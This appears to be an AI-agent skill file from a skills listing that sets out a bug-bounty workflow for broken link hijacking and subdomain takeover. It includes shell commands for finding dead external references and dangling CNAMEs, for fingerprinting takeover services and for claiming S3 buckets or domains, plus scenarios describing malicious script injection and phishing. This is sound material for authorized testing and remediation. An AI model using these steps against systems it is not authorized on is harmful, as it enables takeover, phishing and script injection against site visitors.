exploiting-broken-link-hijacking
SKILL.md
Exploiting Broken Link Hijacking
When to Use
- When auditing web applications for references to expired or unclaimed external resources
- During supply chain security assessments of third-party script and resource dependencies
- When testing for subdomain takeover opportunities via dangling CNAME records
- During bug bounty hunting for broken link hijacking vulnerabilities
- When assessing the security of external resource dependencies in production applications
Prerequisites
- Web crawler or spider for discovering all external links (Burp Suite Spider, Scrapy)
- DNS lookup tools for checking CNAME records and domain availability
- Domain registrar access for claiming expired domains (as proof of concept)
- Understanding of CDN and cloud service provisioning (S3, Azure Blob, GitHub Pages)
- blc (broken-link-checker) or similar tool for automated link validation
- Knowledge of services vulnerable to subdomain takeover (can-i-take-over-xyz)
Workflow
Step 1 — Crawl and Extract All External References
# Use broken-link-checker to find dead links
npx broken-link-checker http://target.com --recursive --ordered \
--exclude-internal --filter-level 3 -o broken_links.txt
# Extract all external links from page source
curl -s http://target.com | grep -oP 'https?://[^"'"'"'\s>]+' | sort -u > all_links.txt
# Extract JavaScript sources
curl -s http://target.com | grep -oP 'src="[^"]*"' | grep -v target.com > external_scripts.txt
# Extract CSS references
curl -s http://target.com | grep -oP 'href="[^"]*\.css"' | grep -v target.com > external_css.txt
# Use wayback machine for historical external references
curl -s "https://web.archive.org/web/timemap/link/http://target.com" | \
grep -oP 'https?://[^>]+' | sort -u > historical_links.txt
# Spider with Burp Suite
# Configure Spider scope to include target.com
# Review Site Map > Filter by "External" to list all external references
Step 2 — Identify Dead or Claimable Resources
# Check if external domains are registered
for domain in $(cat external_domains.txt); do
whois $domain 2>/dev/null | grep -qi "no match\|not found\|available" && \
echo "[CLAIMABLE] $domain"
done
# Check HTTP status of external links
while read url; do
status=$(curl -o /dev/null -s -w "%{http_code}" "$url" --max-time 5)
if [ "$status" = "000" ] || [ "$status" = "404" ]; then
echo "[DEAD] $url (Status: $status)"
fi
done < all_links.txt
# Check for dangling CNAME records
for sub in $(cat subdomains.txt); do
cname=$(dig +short CNAME $sub)
if [ -n "$cname" ]; then
resolved=$(dig +short $cname)
if [ -z "$resolved" ]; then
echo "[DANGLING] $sub -> $cname (UNRESOLVED)"
fi
fi
done
# Check cloud resource availability
# AWS S3 bucket
aws s3 ls s3://target-assets 2>&1 | grep -q "NoSuchBucket" && echo "[CLAIMABLE] S3: target-assets"
Step 3 — Check Service-Specific Takeover Possibilities
# Check GitHub Pages takeover
# If CNAME points to <user>.github.io and 404 is returned
curl -s https://subdomain.target.com | grep -q "There isn't a GitHub Pages site here"
# Check AWS S3 takeover
curl -s http://subdomain.target.com | grep -q "NoSuchBucket"
# Check Azure Blob Storage
curl -s http://subdomain.target.com | grep -q "The specified container does not exist"
# Check Heroku
curl -s http://subdomain.target.com | grep -q "No such app"
# Check Shopify
curl -s http://subdomain.target.com | grep -q "Sorry, this shop is currently unavailable"
# Use subjack for automated takeover detection
subjack -w subdomains.txt -c fingerprints.json -t 100 -o takeover_candidates.txt
# Use nuclei takeover templates
subfinder -d target.com -silent | nuclei -t http/takeovers/ -o takeovers.txt
Step 4 — Verify External Script Hijacking
# Check if external JavaScript domains are available for registration
curl -s http://target.com | grep -oP 'src="https?://([^/"]+)' | \
cut -d'/' -f3 | sort -u | while read domain; do
whois "$domain" 2>/dev/null | grep -qi "no match\|available" && \
echo "[HIJACKABLE SCRIPT] $domain loaded by target.com"
done
# Check npm/CDN package references
curl -s http://target.com | grep -oP 'unpkg\.com/[^@/]+' | sort -u
curl -s http://target.com | grep -oP 'cdn\.jsdelivr\.net/npm/[^@/]+' | sort -u
# Verify if referenced packages still exist
# Check npm registry for deprecated or removed packages
Step 5 — Exploit the Broken Link (Authorized Testing Only)
# For expired domain: Register the domain
# For S3 bucket: Create bucket with same name in same region
aws s3 mb s3://target-expired-bucket --region us-east-1
# For GitHub Pages: Create repository with matching name
# Create <org>.github.io repository with proof-of-concept content
# For unclaimed social media: Claim the handle
# Document the takeover with benign proof-of-concept content
# Serve proof-of-concept content
echo "<html><body><h1>Broken Link Hijacking PoC - [Your Name]</h1></body></html>" > index.html
# Upload to claimed resource
Step 6 — Assess Impact and Report
# Determine impact based on resource type:
# - External JavaScript: Full XSS on all pages loading the script
# - External CSS: UI defacement, data exfiltration via CSS injection
# - External image/resource: Phishing, tracking
# - CNAME subdomain: Cookie theft, phishing, OAuth bypass
# Check if hijacked resource serves cookies for parent domain
# Check if hijacked subdomain is in OAuth redirect whitelist
# Verify if hijacked domain receives sensitive Referer headers
Key Concepts
| Concept | Description |
|---|---|
| Broken Link Hijacking | Claiming control of external resources referenced by target website |
| Dangling CNAME | DNS CNAME record pointing to unclaimed or decommissioned service |
| Subdomain Takeover | Claiming a subdomain by provisioning the service its CNAME points to |
| External Script Hijacking | Registering expired domains that serve JavaScript loaded by target |
| Supply Chain Attack | Compromising external dependencies to inject malicious content |
| Dead Link | URL reference returning 404 or DNS resolution failure |
| Resource Fingerprinting | Identifying specific cloud services from error messages and headers |
Tools & Systems
| Tool | Purpose |
|---|---|
| broken-link-checker | Automated broken link discovery via web crawling |
| subjack | Subdomain takeover detection tool |
| nuclei | Template-based takeover detection scanner |
| can-i-take-over-xyz | Community database of services vulnerable to takeover |
| BadDNS | DNS auditing tool for detecting domain/subdomain takeovers |
| Wayback Machine | Historical URL analysis for discovering past external references |
Common Scenarios
- JavaScript Supply Chain — Register expired domain that serves JavaScript loaded by target; inject malicious code affecting all visitors
- S3 Bucket Takeover — Claim deleted AWS S3 bucket referenced by target; serve malicious content or steal uploaded data
- GitHub Pages Hijack — Create GitHub Pages repository matching dangling CNAME to serve phishing pages on target subdomain
- Social Media Impersonation — Claim unclaimed social media handles linked from target website for brand impersonation
- CDN Package Hijack — Claim deprecated npm packages referenced via CDN URLs to inject malicious JavaScript
Output Format
## Broken Link Hijacking Report
- **Target**: http://target.com
- **Total External Links**: 145
- **Dead Links**: 12
- **Hijackable Resources**: 3
### Findings
| # | Resource | Type | Status | Impact |
|---|----------|------|--------|--------|
| 1 | analytics.expired-domain.com | JavaScript | Domain available | Full XSS |
| 2 | assets.target.com -> S3 bucket | Static assets | Bucket deleted | Content injection |
| 3 | blog.target.com -> GitHub Pages | Subdomain | No GitHub repo | Subdomain takeover |
### Remediation
- Remove references to decommissioned external resources
- Delete dangling CNAME records for unused subdomains
- Implement Subresource Integrity (SRI) for external scripts
- Regularly audit external dependencies for availability
- Use Content Security Policy to restrict allowed script sources
Weekly Installs
3
Repository
mukul975/anthro…y-skillsGitHub Stars
3.4K
First Seen
4 days ago
Security Audits
Installed on
amp3
cline3
opencode3
cursor3
kimi-cli3
codex3